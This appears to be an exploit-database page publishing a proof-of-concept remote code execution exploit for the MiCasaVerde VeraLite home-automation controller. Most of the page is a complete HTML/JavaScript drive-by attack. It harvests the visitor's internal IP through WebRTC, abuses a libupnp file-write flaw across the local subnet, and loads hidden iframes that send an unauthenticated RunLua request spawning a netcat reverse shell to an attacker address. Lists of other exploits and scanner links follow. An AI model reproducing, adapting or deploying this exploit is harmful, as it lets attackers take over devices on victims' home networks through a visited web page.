"MiCasaVerde VeraLite - Remote Code Execution"

Author

Exploit author

"Jacob Baines"

Platform

Exploit platform

hardware

Release date

Exploit published date

2016-10-20

                
                    
                         Download file
                    
                
            
# Exploit Title: MiCasa VeraLite Remote Code Execution
# Date: 10-20-2016
# Software Link: http://getvera.com/controllers/veralite/
# Exploit Author: Jacob Baines
# Contact: https://twitter.com/Junior_Baines
# CVE: CVE-2013-4863 & CVE-2016-6255
# Platform: Hardware

1. Description

A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.

2. Proof of Concept

<!--
    @about
    This file, when loaded in a browser, will attempt to get a reverse shell
    on a VeraLite device on the client's network. This is achieved with the
    following steps:

    1. Acquire the client's internal IP address using webrtc. We then assume the
       client is operating on a \24 network.
    2. POST :49451/z3n.html to every address on the subnet. This leverages two
       things we know to be true about VeraLite:
           - there should be a UPnP HTTP server on 49451
           - VeraLite uses a libupnp vulnerable to CVE-2016-6255.
    3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
       successfully created the file via CVE-2016-6255
    4. z3n.html will allow us to bypass same origin policy and it will make a
       POST request that executes RunLau. This also leverages information we
       know to be true about Veralite:
           - the control URL for HomeAutomationGateway is /upnp/control/hag
           - no auth required
    5. Our RunLua code executes a reverse shell to 192.168.217:1270.

    @note
    This code doesn't run fast in Firefox. This appears to largely be a performance
    issue associated with attaching a lot of iframes to a page. Give the shell
    popping a couple of minutes. In Chrome, it runs pretty fast but might
    exhaust socket usage.

    @citations
    - WebRTC IP leak: https://github.com/diafygi/webrtc-ips
    - Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
    - CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
-->
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <script>
            /**
             * POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
             * libupnp then the page will be written. Once the request has
             * completed, we attempt to load it in an iframe in order to bypass
             * same origin policy. If the page is loaded into the iframe then
             * it will make a soap action request with the action RunLua. The 
             * Lua code will execute a reverse shell.
             * @param ip the ip address to request to
             * @param frame_id the id of the iframe to create
             */
            function create_page(ip, frame_id)
            {
                payload = "<!DOCTYPE html>\n" +
                          "<html>\n" +
                            "<head>\n" +
                                "<title>Try To See It Once My Way</title>\n" +
                                "<script>\n" +
                                    "function exec_lua() {\n" +
                                        "soap_request = \"<s:Envelope s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\" xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\";\n" +
                                        "soap_request += \"<s:Body>\";\n" +
                                        "soap_request += \"<u:RunLua xmlns:u=\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\\\">\";\n" +
                                        "soap_request += \"<Code>os.execute("/bin/sh -c &apos;(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&&apos;")</Code>\";\n" +
                                        "soap_request += \"</u:RunLua>\";\n" +
                                        "soap_request += \"</s:Body>\";\n" +
                                        "soap_request += \"</s:Envelope>\";\n" +

                                        "xhttp = new XMLHttpRequest();\n" +
                                        "xhttp.open(\"POST\", \"upnp/control/hag\", true);\n" +
                                        "xhttp.setRequestHeader(\"MIME-Version\", \"1.0\");\n" +
                                        "xhttp.setRequestHeader(\"Content-type\", \"text/xml;charset=\\\"utf-8\\\"\");\n" +
                                        "xhttp.setRequestHeader(\"Soapaction\", \"\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\\\"\");\n" +
                                        "xhttp.send(soap_request);\n" +
                                    "}\n" +
                                "</scr\ipt>\n" +
                            "</head>\n" +
                            "<body onload=\"exec_lua()\">\n" +
                            "Zen?\n" +
                            "</body>\n" +
                          "</html>";

                var xhttp = new XMLHttpRequest();
                xhttp.open("POST", "http://" + ip  + ":49451/z3n.html", true);
                xhttp.timeout = 1000;
                xhttp.onreadystatechange = function()
                {
                    if (xhttp.readyState == XMLHttpRequest.DONE)
                    {
                        new_iframe = document.createElement('iframe');
                        new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
                        new_iframe.setAttribute("id", frame_id);
                        new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
                        document.body.appendChild(new_iframe);
                    }
                };
                xhttp.send(payload);
            }

            /**
             * This function abuses the webrtc internal IP leak. This function
             * will find the the upper three bytes of network address and simply
             * assume that the client is on a \24 network.
             *
             * Once we have an ip range, we will attempt to create a page on a
             * vulnerable libupnp server via create_page().
             */
            function spray_and_pray()
            {
                RTCPeerConnection = window.RTCPeerConnection ||
                                    window.mozRTCPeerConnection ||
                                    window.webkitRTCPeerConnection;

                peerConn = new RTCPeerConnection({iceServers:[]});
                noop = function() { };

                peerConn.createDataChannel("");
                peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
                peerConn.onicecandidate = function(ice)
                {
                    if (!ice || !ice.candidate || !ice.candidate.candidate)
                    {
                        return;
                    }

                    clientNetwork = /([0-9]{1,3}(\.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
                    peerConn.onicecandidate = noop;

                    if (clientNetwork && clientNetwork.length > 0)
                    {
                        for (i = 0; i < 255; i++)
                        {
                            create_page(clientNetwork + '.' + i, "page"+i);
                        }
                    }
                };
            }
        </script>
    </head>
    <body onload="spray_and_pray()">
    Everything zen.
    </body>
</html>

3. Solution:

No solution exists

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-11-30	"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure"	webapps	hardware	"Zagros Bingol"
2020-11-30	"Intelbras Router RF 301K 1.1.2 - Authentication Bypass"	webapps	hardware	"Kaio Amaral"
2020-11-27	"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution"	webapps	hardware	"Emre SUREN"
2020-11-24	"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"	webapps	hardware	maj0rmil4d
2020-11-23	"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass"	webapps	hardware	malwrforensics
2020-11-19	"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification"	webapps	hardware	"Ricardo Longatto"
2020-11-19	"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure"	remote	hardware	"Nitesh Surana"
2020-11-16	"Cisco 7937G - DoS/Privilege Escalation"	remote	hardware	"Cody Martin"
2020-11-13	"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)"	webapps	hardware	b1ack0wl
2020-11-13	"Citrix ADC NetScaler - Local File Inclusion (Metasploit)"	webapps	hardware	"RAMELLA Sebastien"

Release Date	Title	Type	Platform	Author
2020-04-17	"Cisco IP Phone 11.7 - Denial of service (PoC)"	webapps	hardware	"Jacob Baines"
2020-04-08	"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)"	webapps	hardware	"Jacob Baines"
2020-03-31	"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"	webapps	hardware	"Jacob Baines"
2020-03-31	"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"	webapps	hardware	"Jacob Baines"
2020-03-24	"UCM6202 1.0.18.13 - Remote Command Injection"	webapps	hardware	"Jacob Baines"
2019-10-31	"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning"	remote	hardware	"Jacob Baines"
2019-07-30	"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming"	webapps	hardware	"Jacob Baines"
2019-05-03	"Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection"	webapps	hardware	"Jacob Baines"
2019-02-21	"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass"	remote	hardware	"Jacob Baines"
2019-02-11	"Indusoft Web Studio 8.1 SP2 - Remote Code Execution"	remote	multiple	"Jacob Baines"
2018-12-21	"Netatalk < 3.1.12 - Authentication Bypass"	remote	multiple	"Jacob Baines"
2018-10-10	"MicroTik RouterOS < 6.43rc3 - Remote Root"	remote	hardware	"Jacob Baines"
2018-09-18	"NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)"	remote	hardware	"Jacob Baines"
2017-06-14	"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution"	remote	hardware	"Jacob Baines"
2016-10-20	"MiCasaVerde VeraLite - Remote Code Execution"	remote	hardware	"Jacob Baines"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"MiCasaVerde VeraLite - Remote Code Execution"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.